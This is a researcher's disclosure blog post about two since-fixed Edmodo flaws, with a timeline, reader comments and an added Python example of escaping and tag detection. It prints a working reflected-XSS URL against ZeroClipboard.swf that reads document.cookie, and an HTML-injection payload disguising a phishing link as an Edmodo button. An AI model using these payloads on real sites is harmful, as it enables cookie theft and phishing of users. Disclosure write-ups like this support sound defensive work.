David Sopas – Web Security Researcher

November 6, 2015 at 2:41 pm

Edmodo XSS and HTML Injection

For those who don’t know Edmodo

The safest and easiest way for educators to connect and collaborate with students, parents, and each other.

They have 59,411,899 members. Huge number.

I decided to help them by reporting two security issues: a reflected XSS and an HTML injection.

#1 Reflected XSS

After registering in Edmodo I noticed a request to ZeroClipboard.swf in my Google Chrome inspector.
I know that older versions of this SWF have an XSS vulnerability, so I gave it a try:

https://www.edmodo.com/bin/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Guess what? It was a vulnerable version. It worked perfectly and my cookie was shown in a JavaScript alert box.

[Screenshot: zero_xss]

#2 HTML Injection on Create Invites

This was interesting, and I have already found similar issues on many websites.
Using the invitee_first_name field you could inject HTML into the invitation to trick the victim [invitee_email].

Take for example this proof-of-concept:

Ze<br /><a href="http://www.davidsopas.com/poc/malware.htm" style="font-size:14px;text-decoration:none;margin:0 auto;background:#69a229;color:white;font-weight:400;border:1px solid #457a04;border-radius:4px;display:inline-block" target="_blank"><span style="display:inline-block;padding:10px 34px">Accept Invitation and Win a Bonus</span></a>

When sending a reminder you could also use the same technique:

<br /><a href="http://www.davidsopas.com/poc/malware.htm" style="font-size:14px;text-decoration:none;margin:0 auto;background:#69a229;color:white;font-weight:400;border:1px solid #457a04;border-radius:4px;display:inline-block" target="_blank"><span style="display:inline-block;padding:10px 34px">Accept Invitation and Win a Bonus</span></a>

This would be reflected in the victim's email. I used the same style as an existing Edmodo button. When the victim clicked it, they were taken to my proof-of-concept page.

Possible attack scenario:

  1. Malicious user sends invitations with an HTML injection [like my proof-of-concept]
  2. Victim thinks that's a button from Edmodo and clicks on it.
  3. Victim's browser gets hijacked
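
As an added illustration (not code from this post or from Edmodo), here is the defective pattern behind the invite bug next to the fix: the name field is HTML-escaped at the point it is embedded in the email template, so markup in a name shows up as literal text, and an input-side check flags names containing tags for logging. The template, the PoC-style sample name and the example.invalid URL are assumptions constructed for this example.

```python
import html
import re

# Constructed sample input, modelled on the proof-of-concept in the post
# (assumption: this is what the invitee_first_name field received).
INJECTED_NAME = (
    'Ze<br /><a href="http://example.invalid/poc" target="_blank">'
    '<span>Accept Invitation and Win a Bonus</span></a>'
)

# Assumed email template: the name lands inside an HTML paragraph.
TEMPLATE = "<p>{name} has invited you to join the group.</p>"


def render_invite_vulnerable(name: str) -> str:
    """Defective pattern: user input is concatenated straight into HTML."""
    return TEMPLATE.format(name=name)


def render_invite_hardened(name: str) -> str:
    """Fix: escape on output. quote=True also neutralises quotes, so the
    same helper is safe if the name is ever placed inside an attribute."""
    return TEMPLATE.format(name=html.escape(name, quote=True))


# A person's name should never contain a tag; matching one is a signal
# worth logging or alerting on, independent of the output escaping above.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")


def looks_like_markup(name: str) -> bool:
    """Input-side check for tags in a name field (detection, not a substitute for escaping)."""
    return bool(TAG_RE.search(name))


def count_anchors(rendered: str) -> int:
    """How many live <a ...> elements a mail client would render from this body."""
    return len(re.findall(r"<a\s", rendered))


if __name__ == "__main__":
    print("vulnerable anchors:", count_anchors(render_invite_vulnerable(INJECTED_NAME)))
    print("hardened anchors:  ", count_anchors(render_invite_hardened(INJECTED_NAME)))
    print("flag for review:   ", looks_like_markup(INJECTED_NAME))
```

Escaping belongs at the output boundary (the template), not only at input: the same name may later be rendered in a web page, a plain-text mail and a push notification, and each sink needs its own encoding. The tag check is there so the abuse is visible in logs even when the template is already safe.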

The Edmodo guys were awesome, giving constant updates on the report status. They also sent me some goodies, but European customs retained the package 🙂

Timeline:
13-10-2015 I sent an email requesting a security contact
13-10-2015 Edmodo replied to the above question
13-10-2015 I sent the security report
22-10-2015 Edmodo replied that both issues were validated and they’re working on it
04-11-2015 Edmodo fixed both issues
06-11-2015 Full disclosure


6 thoughts on “Edmodo XSS and HTML Injection”

  1. tbm says:

    thanks for the article,

    where is the invitee_first_name field and how did you inject it? couldn't see

    regards

    1. David Sopas says:

      In the text field where you type the name of the user you want to invite to a group or something else.

  2. Paltry_Digger says:

    Does Edmodo have a place to contact them about vulnerabilities? I’ve also found something and am wondering where to report it.

    1. David Sopas says:

      @Paltry_Digger – privacy at edmodo.com. Hope it helps!

      1. Paltry_Digger says:

        Thanks! Just got my Edmodo mug and t-shirt for a stored XSS vulnerability 🙂

        1. David Sopas says:

          No worries. Edmodo are such cool guys 🙂
